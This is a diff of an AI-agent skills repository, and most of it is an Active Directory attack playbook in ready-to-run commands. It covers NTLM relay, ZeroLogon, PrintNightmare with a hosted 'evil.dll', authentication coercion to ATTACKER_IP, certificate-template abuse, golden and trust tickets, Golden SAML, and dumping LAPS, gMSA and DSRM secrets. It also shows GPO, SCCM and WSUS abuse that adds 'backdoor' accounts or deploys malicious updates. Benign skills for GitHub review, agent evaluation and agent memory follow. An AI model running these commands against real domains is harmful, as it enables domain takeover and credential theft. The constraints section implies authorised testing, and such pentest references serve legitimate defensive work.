||||
```
|
||||
|
||||
### OverPass-the-Hash
|
||||
|
||||
Convert NTLM hash to Kerberos ticket:
|
||||
|
||||
```bash
|
||||
# Impacket
|
||||
getTGT.py domain.local/user -hashes :NTHASH
|
||||
export KRB5CCNAME=user.ccache
|
||||
|
||||
# Rubeus
|
||||
.\Rubeus.exe asktgt /user:user /rc4:NTHASH /ptt
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## NTLM Relay Attacks
|
||||
|
||||
### Responder + ntlmrelayx
|
||||
|
||||
```bash
|
||||
# Start Responder (disable SMB/HTTP for relay)
|
||||
responder -I eth0 -wrf
|
||||
|
||||
# Start relay
|
||||
ntlmrelayx.py -tf targets.txt -smb2support
|
||||
|
||||
# LDAP relay for delegation attack
|
||||
ntlmrelayx.py -t ldaps://dc.domain.local -wh attacker-wpad --delegate-access
|
||||
```
|
||||
|
||||
### SMB Signing Check
|
||||
|
||||
```bash
|
||||
crackmapexec smb 10.10.10.0/24 --gen-relay-list targets.txt
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Certificate Services Attacks (AD CS)
|
||||
|
||||
### ESC1 - Misconfigured Templates
|
||||
|
||||
```bash
|
||||
# Find vulnerable templates
|
||||
certipy find -u user@domain.local -p password -dc-ip 10.10.10.10
|
||||
|
||||
# Exploit ESC1
|
||||
certipy req -u user@domain.local -p password -ca CA-NAME -target dc.domain.local -template VulnTemplate -upn administrator@domain.local
|
||||
|
||||
# Authenticate with certificate
|
||||
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
|
||||
```
|
||||
|
||||
### ESC8 - Web Enrollment Relay
|
||||
|
||||
```bash
|
||||
ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Critical CVEs
|
||||
|
||||
### ZeroLogon (CVE-2020-1472)
|
||||
|
||||
```bash
|
||||
# Check vulnerability
|
||||
crackmapexec smb 10.10.10.10 -u '' -p '' -M zerologon
|
||||
|
||||
# Exploit
|
||||
python3 cve-2020-1472-exploit.py DC01 10.10.10.10
|
||||
|
||||
# Extract hashes
|
||||
secretsdump.py -just-dc domain.local/DC01\$@10.10.10.10 -no-pass
|
||||
|
||||
# Restore password (important!)
|
||||
python3 restorepassword.py domain.local/DC01@DC01 -target-ip 10.10.10.10 -hexpass HEXPASSWORD
|
||||
```
|
||||
|
||||
### PrintNightmare (CVE-2021-1675)
|
||||
|
||||
```bash
|
||||
# Check for vulnerability
|
||||
rpcdump.py @10.10.10.10 | grep 'MS-RPRN'
|
||||
|
||||
# Exploit (requires hosting malicious DLL)
|
||||
python3 CVE-2021-1675.py domain.local/user:pass@10.10.10.10 '\\attacker\share\evil.dll'
|
||||
```
|
||||
|
||||
### samAccountName Spoofing (CVE-2021-42278/42287)
|
||||
|
||||
```bash
|
||||
# Automated exploitation
|
||||
python3 sam_the_admin.py "domain.local/user:password" -dc-ip 10.10.10.10 -shell
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Quick Reference
|
||||
|
||||
| Attack | Tool | Command |
|
||||
|--------|------|---------|
|
||||
| Kerberoast | Impacket | `GetUserSPNs.py domain/user:pass -request` |
|
||||
| AS-REP Roast | Impacket | `GetNPUsers.py domain/ -usersfile users.txt` |
|
||||
| DCSync | secretsdump | `secretsdump.py domain/admin:pass@DC` |
|
||||
| Pass-the-Hash | psexec | `psexec.py domain/user@target -hashes :HASH` |
|
||||
| Golden Ticket | Mimikatz | `kerberos::golden /user:Admin /krbtgt:HASH` |
|
||||
| Spray | kerbrute | `kerbrute passwordspray -d domain users.txt Pass` |
|
||||
|
||||
---
|
||||
|
||||
## Constraints
|
||||
|
||||
**Must:**
|
||||
- Synchronize time with DC before Kerberos attacks
|
||||
- Have valid domain credentials for most attacks
|
||||
- Document all compromised accounts
|
||||
|
||||
**Must Not:**
|
||||
- Lock out accounts with excessive password spraying
|
||||
- Modify production AD objects without approval
|
||||
- Leave Golden Tickets without documentation
|
||||
|
||||
**Should:**
|
||||
- Run BloodHound for attack path discovery
|
||||
- Check for SMB signing before relay attacks
|
||||
- Verify patch levels for CVE exploitation
|
||||
|
||||
---
|
||||
|
||||
## Examples
|
||||
|
||||
### Example 1: Domain Compromise via Kerberoasting
|
||||
|
||||
```bash
|
||||
# 1. Find service accounts with SPNs
|
||||
GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10
|
||||
|
||||
# 2. Request TGS tickets
|
||||
GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10 -request -outputfile tgs.txt
|
||||
|
||||
# 3. Crack tickets
|
||||
hashcat -m 13100 tgs.txt rockyou.txt
|
||||
|
||||
# 4. Use cracked service account
|
||||
psexec.py domain.local/svc_admin:CrackedPassword@10.10.10.10
|
||||
```
|
||||
|
||||
### Example 2: NTLM Relay to LDAP
|
||||
|
||||
```bash
|
||||
# 1. Start relay targeting LDAP
|
||||
ntlmrelayx.py -t ldaps://dc.domain.local --delegate-access
|
||||
|
||||
# 2. Trigger authentication (e.g., via PrinterBug)
|
||||
python3 printerbug.py domain.local/user:pass@target 10.10.10.12
|
||||
|
||||
# 3. Use created machine account for RBCD attack
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
| Issue | Solution |
|
||||
|-------|----------|
|
||||
| Clock skew too great | Sync time with DC or use faketime |
|
||||
| Kerberoasting returns empty | No service accounts with SPNs |
|
||||
| DCSync access denied | Need Replicating Directory Changes rights |
|
||||
| NTLM relay fails | Check SMB signing, try LDAP target |
|
||||
| BloodHound empty | Verify collector ran with correct creds |
|
||||
|
||||
---
|
||||
|
||||
## Additional Resources
|
||||
|
||||
For advanced techniques including delegation attacks, GPO abuse, RODC attacks, SCCM/WSUS deployment, ADCS exploitation, trust relationships, and Linux AD integration, see [references/advanced-attacks.md](references/advanced-attacks.md).
|
||||
382
skills/active-directory-attacks/references/advanced-attacks.md
Normal file
382
skills/active-directory-attacks/references/advanced-attacks.md
Normal file
@@ -0,0 +1,382 @@
|
||||
# Advanced Active Directory Attacks Reference
|
||||
|
||||
## Table of Contents
|
||||
1. [Delegation Attacks](#delegation-attacks)
|
||||
2. [Group Policy Object Abuse](#group-policy-object-abuse)
|
||||
3. [RODC Attacks](#rodc-attacks)
|
||||
4. [SCCM/WSUS Deployment](#sccmwsus-deployment)
|
||||
5. [AD Certificate Services (ADCS)](#ad-certificate-services-adcs)
|
||||
6. [Trust Relationship Attacks](#trust-relationship-attacks)
|
||||
7. [ADFS Golden SAML](#adfs-golden-saml)
|
||||
8. [Credential Sources](#credential-sources)
|
||||
9. [Linux AD Integration](#linux-ad-integration)
|
||||
|
||||
---
|
||||
|
||||
## Delegation Attacks
|
||||
|
||||
### Unconstrained Delegation
|
||||
|
||||
When a user authenticates to a computer with unconstrained delegation, their TGT is saved to memory.
|
||||
|
||||
**Find Delegation:**
|
||||
```powershell
|
||||
# PowerShell
|
||||
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
|
||||
|
||||
# BloodHound
|
||||
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
|
||||
```
|
||||
|
||||
**SpoolService Abuse:**
|
||||
```bash
|
||||
# Check spooler service
|
||||
ls \\dc01\pipe\spoolss
|
||||
|
||||
# Trigger with SpoolSample
|
||||
.\SpoolSample.exe DC01.domain.local HELPDESK.domain.local
|
||||
|
||||
# Or with printerbug.py
|
||||
python3 printerbug.py 'domain/user:pass'@DC01 ATTACKER_IP
|
||||
```
|
||||
|
||||
**Monitor with Rubeus:**
|
||||
```powershell
|
||||
Rubeus.exe monitor /interval:1
|
||||
```
|
||||
|
||||
### Constrained Delegation
|
||||
|
||||
**Identify:**
|
||||
```powershell
|
||||
Get-DomainComputer -TrustedToAuth | select -exp msds-AllowedToDelegateTo
|
||||
```
|
||||
|
||||
**Exploit with Rubeus:**
|
||||
```powershell
|
||||
# S4U2 attack
|
||||
Rubeus.exe s4u /user:svc_account /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/target.domain.local /ptt
|
||||
```
|
||||
|
||||
**Exploit with Impacket:**
|
||||
```bash
|
||||
getST.py -spn HOST/target.domain.local 'domain/user:password' -impersonate Administrator -dc-ip DC_IP
|
||||
```
|
||||
|
||||
### Resource-Based Constrained Delegation (RBCD)
|
||||
|
||||
```powershell
|
||||
# Create machine account
|
||||
New-MachineAccount -MachineAccount AttackerPC -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)
|
||||
|
||||
# Set delegation
|
||||
Set-ADComputer target -PrincipalsAllowedToDelegateToAccount AttackerPC$
|
||||
|
||||
# Get ticket
|
||||
.\Rubeus.exe s4u /user:AttackerPC$ /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/target.domain.local /ptt
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Group Policy Object Abuse
|
||||
|
||||
### Find Vulnerable GPOs
|
||||
|
||||
```powershell
|
||||
Get-DomainObjectAcl -Identity "SuperSecureGPO" -ResolveGUIDs | Where-Object {($_.ActiveDirectoryRights.ToString() -match "GenericWrite|WriteDacl|WriteOwner")}
|
||||
```
|
||||
|
||||
### Abuse with SharpGPOAbuse
|
||||
|
||||
```powershell
|
||||
# Add local admin
|
||||
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount attacker --GPOName "Vulnerable GPO"
|
||||
|
||||
# Add user rights
|
||||
.\SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount attacker --GPOName "Vulnerable GPO"
|
||||
|
||||
# Add immediate task
|
||||
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c net user backdoor Password123! /add" --GPOName "Vulnerable GPO"
|
||||
```
|
||||
|
||||
### Abuse with pyGPOAbuse (Linux)
|
||||
|
||||
```bash
|
||||
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## RODC Attacks
|
||||
|
||||
### RODC Golden Ticket
|
||||
|
||||
RODCs contain filtered AD copy (excludes LAPS/Bitlocker keys). Forge tickets for principals in msDS-RevealOnDemandGroup.
|
||||
|
||||
### RODC Key List Attack
|
||||
|
||||
**Requirements:**
|
||||
- krbtgt credentials of the RODC (-rodcKey)
|
||||
- ID of the krbtgt account of the RODC (-rodcNo)
|
||||
|
||||
```bash
|
||||
# Impacket keylistattack
|
||||
keylistattack.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -full
|
||||
|
||||
# Using secretsdump with keylist
|
||||
secretsdump.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -use-keylist
|
||||
```
|
||||
|
||||
**Using Rubeus:**
|
||||
```powershell
|
||||
Rubeus.exe golden /rodcNumber:25078 /aes256:RODC_AES256_KEY /user:Administrator /id:500 /domain:domain.local /sid:S-1-5-21-xxx
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## SCCM/WSUS Deployment
|
||||
|
||||
### SCCM Attack with MalSCCM
|
||||
|
||||
```bash
|
||||
# Locate SCCM server
|
||||
MalSCCM.exe locate
|
||||
|
||||
# Enumerate targets
|
||||
MalSCCM.exe inspect /all
|
||||
MalSCCM.exe inspect /computers
|
||||
|
||||
# Create target group
|
||||
MalSCCM.exe group /create /groupname:TargetGroup /grouptype:device
|
||||
MalSCCM.exe group /addhost /groupname:TargetGroup /host:TARGET-PC
|
||||
|
||||
# Create malicious app
|
||||
MalSCCM.exe app /create /name:backdoor /uncpath:"\\SCCM\SCCMContentLib$\evil.exe"
|
||||
|
||||
# Deploy
|
||||
MalSCCM.exe app /deploy /name:backdoor /groupname:TargetGroup /assignmentname:update
|
||||
|
||||
# Force checkin
|
||||
MalSCCM.exe checkin /groupname:TargetGroup
|
||||
|
||||
# Cleanup
|
||||
MalSCCM.exe app /cleanup /name:backdoor
|
||||
MalSCCM.exe group /delete /groupname:TargetGroup
|
||||
```
|
||||
|
||||
### SCCM Network Access Accounts
|
||||
|
||||
```powershell
|
||||
# Find SCCM blob
|
||||
Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount"
|
||||
|
||||
# Decrypt with SharpSCCM
|
||||
.\SharpSCCM.exe get naa -u USERNAME -p PASSWORD
|
||||
```
|
||||
|
||||
### WSUS Deployment Attack
|
||||
|
||||
```bash
|
||||
# Using SharpWSUS
|
||||
SharpWSUS.exe locate
|
||||
SharpWSUS.exe inspect
|
||||
|
||||
# Create malicious update
|
||||
SharpWSUS.exe create /payload:"C:\psexec.exe" /args:"-accepteula -s -d cmd.exe /c \"net user backdoor Password123! /add\"" /title:"Critical Update"
|
||||
|
||||
# Deploy to target
|
||||
SharpWSUS.exe approve /updateid:GUID /computername:TARGET.domain.local /groupname:"Demo Group"
|
||||
|
||||
# Check status
|
||||
SharpWSUS.exe check /updateid:GUID /computername:TARGET.domain.local
|
||||
|
||||
# Cleanup
|
||||
SharpWSUS.exe delete /updateid:GUID /computername:TARGET.domain.local /groupname:"Demo Group"
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## AD Certificate Services (ADCS)
|
||||
|
||||
### ESC1 - Misconfigured Templates
|
||||
|
||||
Template allows ENROLLEE_SUPPLIES_SUBJECT with Client Authentication EKU.
|
||||
|
||||
```bash
|
||||
# Find vulnerable templates
|
||||
certipy find -u user@domain.local -p password -dc-ip DC_IP -vulnerable
|
||||
|
||||
# Request certificate as admin
|
||||
certipy req -u user@domain.local -p password -ca CA-NAME -target ca.domain.local -template VulnTemplate -upn administrator@domain.local
|
||||
|
||||
# Authenticate
|
||||
certipy auth -pfx administrator.pfx -dc-ip DC_IP
|
||||
```
|
||||
|
||||
### ESC4 - ACL Vulnerabilities
|
||||
|
||||
```python
|
||||
# Check for WriteProperty
|
||||
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -get-acl
|
||||
|
||||
# Add ENROLLEE_SUPPLIES_SUBJECT flag
|
||||
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -add CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
|
||||
|
||||
# Perform ESC1, then restore
|
||||
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip DC_IP -value 0 -property mspki-Certificate-Name-Flag
|
||||
```
|
||||
|
||||
### ESC8 - NTLM Relay to Web Enrollment
|
||||
|
||||
```bash
|
||||
# Start relay
|
||||
ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
|
||||
|
||||
# Coerce authentication
|
||||
python3 petitpotam.py ATTACKER_IP DC_IP
|
||||
|
||||
# Use certificate
|
||||
Rubeus.exe asktgt /user:DC$ /certificate:BASE64_CERT /ptt
|
||||
```
|
||||
|
||||
### Shadow Credentials
|
||||
|
||||
```bash
|
||||
# Add Key Credential (pyWhisker)
|
||||
python3 pywhisker.py -d "domain.local" -u "user1" -p "password" --target "TARGET" --action add
|
||||
|
||||
# Get TGT with PKINIT
|
||||
python3 gettgtpkinit.py -cert-pfx "cert.pfx" -pfx-pass "password" "domain.local/TARGET" target.ccache
|
||||
|
||||
# Get NT hash
|
||||
export KRB5CCNAME=target.ccache
|
||||
python3 getnthash.py -key 'AS-REP_KEY' domain.local/TARGET
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Trust Relationship Attacks
|
||||
|
||||
### Child to Parent Domain (SID History)
|
||||
|
||||
```powershell
|
||||
# Get Enterprise Admins SID from parent
|
||||
$ParentSID = "S-1-5-21-PARENT-DOMAIN-SID-519"
|
||||
|
||||
# Create Golden Ticket with SID History
|
||||
kerberos::golden /user:Administrator /domain:child.parent.local /sid:S-1-5-21-CHILD-SID /krbtgt:KRBTGT_HASH /sids:$ParentSID /ptt
|
||||
```
|
||||
|
||||
### Forest to Forest (Trust Ticket)
|
||||
|
||||
```bash
|
||||
# Dump trust key
|
||||
lsadump::trust /patch
|
||||
|
||||
# Forge inter-realm TGT
|
||||
kerberos::golden /domain:domain.local /sid:S-1-5-21-xxx /rc4:TRUST_KEY /user:Administrator /service:krbtgt /target:external.com /ticket:trust.kirbi
|
||||
|
||||
# Use trust ticket
|
||||
.\Rubeus.exe asktgs /ticket:trust.kirbi /service:cifs/target.external.com /dc:dc.external.com /ptt
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## ADFS Golden SAML
|
||||
|
||||
**Requirements:**
|
||||
- ADFS service account access
|
||||
- Token signing certificate (PFX + decryption password)
|
||||
|
||||
```bash
|
||||
# Dump with ADFSDump
|
||||
.\ADFSDump.exe
|
||||
|
||||
# Forge SAML token
|
||||
python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s adfs.domain.local saml2 --endpoint https://target/saml --nameid administrator@domain.local
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Credential Sources
|
||||
|
||||
### LAPS Password
|
||||
|
||||
```powershell
|
||||
# PowerShell
|
||||
Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'
|
||||
|
||||
# CrackMapExec
|
||||
crackmapexec ldap DC_IP -u user -p password -M laps
|
||||
```
|
||||
|
||||
### GMSA Password
|
||||
|
||||
```powershell
|
||||
# PowerShell + DSInternals
|
||||
$gmsa = Get-ADServiceAccount -Identity 'SVC_ACCOUNT' -Properties 'msDS-ManagedPassword'
|
||||
$mp = $gmsa.'msDS-ManagedPassword'
|
||||
ConvertFrom-ADManagedPasswordBlob $mp
|
||||
```
|
||||
|
||||
```bash
|
||||
# Linux with bloodyAD
|
||||
python bloodyAD.py -u user -p password --host DC_IP getObjectAttributes gmsaAccount$ msDS-ManagedPassword
|
||||
```
|
||||
|
||||
### Group Policy Preferences (GPP)
|
||||
|
||||
```bash
|
||||
# Find in SYSVOL
|
||||
findstr /S /I cpassword \\domain.local\sysvol\domain.local\policies\*.xml
|
||||
|
||||
# Decrypt
|
||||
python3 Get-GPPPassword.py -no-pass 'DC_IP'
|
||||
```
|
||||
|
||||
### DSRM Credentials
|
||||
|
||||
```powershell
|
||||
# Dump DSRM hash
|
||||
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
|
||||
|
||||
# Enable DSRM admin logon
|
||||
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Linux AD Integration
|
||||
|
||||
### CCACHE Ticket Reuse
|
||||
|
||||
```bash
|
||||
# Find tickets
|
||||
ls /tmp/ | grep krb5cc
|
||||
|
||||
# Use ticket
|
||||
export KRB5CCNAME=/tmp/krb5cc_1000
|
||||
```
|
||||
|
||||
### Extract from Keytab
|
||||
|
||||
```bash
|
||||
# List keys
|
||||
klist -k /etc/krb5.keytab
|
||||
|
||||
# Extract with KeyTabExtract
|
||||
python3 keytabextract.py /etc/krb5.keytab
|
||||
```
|
||||
|
||||
### Extract from SSSD
|
||||
|
||||
```bash
|
||||
# Database location
|
||||
/var/lib/sss/secrets/secrets.ldb
|
||||
|
||||
# Key location
|
||||
/var/lib/sss/secrets/.secrets.mkey
|
||||
|
||||
# Extract
|
||||
python3 SSSDKCMExtractor.py --database secrets.ldb --key secrets.mkey
|
||||
```
|
||||
55
skills/address-github-comments/SKILL.md
Normal file
55
skills/address-github-comments/SKILL.md
Normal file
@@ -0,0 +1,55 @@
|
||||
---
|
||||
name: address-github-comments
|
||||
description: Use when you need to address review or issue comments on an open GitHub Pull Request using the gh CLI.
|
||||
---
|
||||
|
||||
# Address GitHub Comments
|
||||
|
||||
## Overview
|
||||
|
||||
Efficiently address PR review comments or issue feedback using the GitHub CLI (`gh`). This skill ensures all feedback is addressed systematically.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
Ensure `gh` is authenticated.
|
||||
|
||||
```bash
|
||||
gh auth status
|
||||
```
|
||||
|
||||
If not logged in, run `gh auth login`.
|
||||
|
||||
## Workflow
|
||||
|
||||
### 1. Inspect Comments
|
||||
|
||||
Fetch the comments for the current branch's PR.
|
||||
|
||||
```bash
|
||||
gh pr view --comments
|
||||
```
|
||||
|
||||
Or use a custom script if available to list threads.
|
||||
|
||||
### 2. Categorize and Plan
|
||||
|
||||
- List the comments and review threads.
|
||||
- Propose a fix for each.
|
||||
- **Wait for user confirmation** on which comments to address first if there are many.
|
||||
|
||||
### 3. Apply Fixes
|
||||
|
||||
Apply the code changes for the selected comments.
|
||||
|
||||
### 4. Respond to Comments
|
||||
|
||||
Once fixed, respond to the threads as resolved.
|
||||
|
||||
```bash
|
||||
gh pr comment <PR_NUMBER> --body "Addressed in latest commit."
|
||||
```
|
||||
|
||||
## Common Mistakes
|
||||
|
||||
- **Applying fixes without understanding context**: Always read the surrounding code of a comment.
|
||||
- **Not verifying auth**: Check `gh auth status` before starting.
|
||||
64
skills/agent-evaluation/SKILL.md
Normal file
64
skills/agent-evaluation/SKILL.md
Normal file
@@ -0,0 +1,64 @@
|
||||
---
|
||||
name: agent-evaluation
|
||||
description: "Testing and benchmarking LLM agents including behavioral testing, capability assessment, reliability metrics, and production monitoring—where even top agents achieve less than 50% on real-world benchmarks Use when: agent testing, agent evaluation, benchmark agents, agent reliability, test agent."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Agent Evaluation
|
||||
|
||||
You're a quality engineer who has seen agents that aced benchmarks fail spectacularly in
|
||||
production. You've learned that evaluating LLM agents is fundamentally different from
|
||||
testing traditional software—the same input can produce different outputs, and "correct"
|
||||
often has no single answer.
|
||||
|
||||
You've built evaluation frameworks that catch issues before production: behavioral regression
|
||||
tests, capability assessments, and reliability metrics. You understand that the goal isn't
|
||||
100% test pass rate—it
|
||||
|
||||
## Capabilities
|
||||
|
||||
- agent-testing
|
||||
- benchmark-design
|
||||
- capability-assessment
|
||||
- reliability-metrics
|
||||
- regression-testing
|
||||
|
||||
## Requirements
|
||||
|
||||
- testing-fundamentals
|
||||
- llm-fundamentals
|
||||
|
||||
## Patterns
|
||||
|
||||
### Statistical Test Evaluation
|
||||
|
||||
Run tests multiple times and analyze result distributions
|
||||
|
||||
### Behavioral Contract Testing
|
||||
|
||||
Define and test agent behavioral invariants
|
||||
|
||||
### Adversarial Testing
|
||||
|
||||
Actively try to break agent behavior
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Single-Run Testing
|
||||
|
||||
### ❌ Only Happy Path Tests
|
||||
|
||||
### ❌ Output String Matching
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Agent scores well on benchmarks but fails in production | high | // Bridge benchmark and production evaluation |
|
||||
| Same test passes sometimes, fails other times | high | // Handle flaky tests in LLM agent evaluation |
|
||||
| Agent optimized for metric, not actual task | medium | // Multi-dimensional evaluation to prevent gaming |
|
||||
| Test data accidentally used in training or prompts | critical | // Prevent data leakage in agent evaluation |
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `multi-agent-orchestration`, `agent-communication`, `autonomous-agents`
|
||||
40
skills/agent-manager-skill/SKILL.md
Normal file
40
skills/agent-manager-skill/SKILL.md
Normal file
@@ -0,0 +1,40 @@
|
||||
---
|
||||
name: agent-manager-skill
|
||||
description: Manage multiple local CLI agents via tmux sessions (start/stop/monitor/assign) with cron-friendly scheduling.
|
||||
---
|
||||
|
||||
# Agent Manager Skill
|
||||
|
||||
## When to use
|
||||
|
||||
Use this skill when you need to:
|
||||
|
||||
- run multiple local CLI agents in parallel (separate tmux sessions)
|
||||
- start/stop agents and tail their logs
|
||||
- assign tasks to agents and monitor output
|
||||
- schedule recurring agent work (cron)
|
||||
|
||||
## Prerequisites
|
||||
|
||||
Install `agent-manager-skill` in your workspace:
|
||||
|
||||
```bash
|
||||
git clone https://github.com/fractalmind-ai/agent-manager-skill.git
|
||||
```
|
||||
|
||||
## Common commands
|
||||
|
||||
```bash
|
||||
python3 agent-manager/scripts/main.py doctor
|
||||
python3 agent-manager/scripts/main.py list
|
||||
python3 agent-manager/scripts/main.py start EMP_0001
|
||||
python3 agent-manager/scripts/main.py monitor EMP_0001 --follow
|
||||
python3 agent-manager/scripts/main.py assign EMP_0002 <<'EOF'
|
||||
Follow teams/fractalmind-ai-maintenance.md Workflow
|
||||
EOF
|
||||
```
|
||||
|
||||
## Notes
|
||||
|
||||
- Requires `tmux` and `python3`.
|
||||
- Agents are configured under an `agents/` directory (see the repo for examples).
|
||||
67
skills/agent-memory-systems/SKILL.md
Normal file
67
skills/agent-memory-systems/SKILL.md
Normal file
@@ -0,0 +1,67 @@
|
||||
---
|
||||
name: agent-memory-systems
|
||||
description: "Memory is the cornerstone of intelligent agents. Without it, every interaction starts from zero. This skill covers the architecture of agent memory: short-term (context window), long-term (vector stores), and the cognitive architectures that organize them. Key insight: Memory isn't just storage - it's retrieval. A million stored facts mean nothing if you can't find the right one. Chunking, embedding, and retrieval strategies determine whether your agent remembers or forgets. The field is fragm"
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Agent Memory Systems
|
||||
|
||||
You are a cognitive architect who understands that memory makes agents intelligent.
|
||||
You've built memory systems for agents handling millions of interactions. You know
|
||||
that the hard part isn't storing - it's retrieving the right memory at the right time.
|
||||
|
||||
Your core insight: Memory failures look like intelligence failures. When an agent
|
||||
"forgets" or gives inconsistent answers, it's almost always a retrieval problem,
|
||||
not a storage problem. You obsess over chunking strategies, embedding quality,
|
||||
and
|
||||
|
||||
## Capabilities
|
||||
|
||||
- agent-memory
|
||||
- long-term-memory
|
||||
- short-term-memory
|
||||
- working-memory
|
||||
- episodic-memory
|
||||
- semantic-memory
|
||||
- procedural-memory
|
||||
- memory-retrieval
|
||||
- memory-formation
|
||||
- memory-decay
|
||||
|
||||
## Patterns
|
||||
|
||||
### Memory Type Architecture
|
||||
|
||||
Choosing the right memory type for different information
|
||||
|
||||
### Vector Store Selection Pattern
|
||||
|
||||
Choosing the right vector database for your use case
|
||||
|
||||
### Chunking Strategy Pattern
|
||||
|
||||
Breaking documents into retrievable chunks
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Store Everything Forever
|
||||
|
||||
### ❌ Chunk Without Testing Retrieval
|
||||
|
||||
### ❌ Single Memory Type for All Data
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Issue | critical | ## Contextual Chunking (Anthropic's approach) |
|
||||
| Issue | high | ## Test different sizes |
|
||||
| Issue | high | ## Always filter by metadata first |
|
||||
| Issue | high | ## Add temporal scoring |
|
||||
| Issue | medium | ## Detect conflicts on storage |
|
||||
| Issue | medium | ## Budget tokens for different memory types |
|
||||
| Issue | medium | ## Track embedding model in metadata |
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `autonomous-agents`, `multi-agent-orchestration`, `llm-architect`, `agent-tool-builder`
|
||||
53
skills/agent-tool-builder/SKILL.md
Normal file
53
skills/agent-tool-builder/SKILL.md
Normal file
@@ -0,0 +1,53 @@
|
||||
---
|
||||
name: agent-tool-builder
|
||||
description: "Tools are how AI agents interact with the world. A well-designed tool is the difference between an agent that works and one that hallucinates, fails silently, or costs 10x more tokens than necessary. This skill covers tool design from schema to error handling. JSON Schema best practices, description writing that actually helps the LLM, validation, and the emerging MCP standard that's becoming the lingua franca for AI tools. Key insight: Tool descriptions are more important than tool implementa"
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Agent Tool Builder
|
||||
|
||||
You are an expert in the interface between LLMs and the outside world.
|
||||
You've seen tools that work beautifully and tools that cause agents to
|
||||
hallucinate, loop, or fail silently. The difference is almost always
|
||||
in the design, not the implementation.
|
||||
|
||||
Your core insight: The LLM never sees your code. It only sees the schema
|
||||
and description. A perfectly implemented tool with a vague description
|
||||
will fail. A simple tool with crystal-clear documentation will succeed.
|
||||
|
||||
You push for explicit error hand
|
||||
|
||||
## Capabilities
|
||||
|
||||
- agent-tools
|
||||
- function-calling
|
||||
- tool-schema-design
|
||||
- mcp-tools
|
||||
- tool-validation
|
||||
- tool-error-handling
|
||||
|
||||
## Patterns
|
||||
|
||||
### Tool Schema Design
|
||||
|
||||
Creating clear, unambiguous JSON Schema for tools
|
||||
|
||||
### Tool with Input Examples
|
||||
|
||||
Using examples to guide LLM tool usage
|
||||
|
||||
### Tool Error Handling
|
||||
|
||||
Returning errors that help the LLM recover
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Vague Descriptions
|
||||
|
||||
### ❌ Silent Failures
|
||||
|
||||
### ❌ Too Many Tools
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `multi-agent-orchestration`, `api-designer`, `llm-architect`, `backend`
|
||||
90
skills/ai-agents-architect/SKILL.md
Normal file
90
skills/ai-agents-architect/SKILL.md
Normal file
@@ -0,0 +1,90 @@
|
||||
---
|
||||
name: ai-agents-architect
|
||||
description: "Expert in designing and building autonomous AI agents. Masters tool use, memory systems, planning strategies, and multi-agent orchestration. Use when: build agent, AI agent, autonomous agent, tool use, function calling."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# AI Agents Architect
|
||||
|
||||
**Role**: AI Agent Systems Architect
|
||||
|
||||
I build AI systems that can act autonomously while remaining controllable.
|
||||
